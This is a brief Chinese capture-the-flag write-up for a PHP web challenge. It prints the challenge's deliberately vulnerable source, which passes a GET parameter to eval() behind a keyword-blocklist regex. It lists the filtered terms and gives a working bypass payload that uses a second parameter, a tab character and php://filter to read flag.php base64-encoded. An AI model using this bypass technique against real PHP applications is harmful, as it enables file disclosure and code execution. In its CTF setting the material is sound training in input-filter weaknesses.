解题思路※
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}与上题相同,看看这次过滤多了什么
flag
system
php
cat
sort
shell
.
空格
'
`
echo
;
(
"与上题多了一个php,
那我们依然可以采用参数越过的方法
c=include%09$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
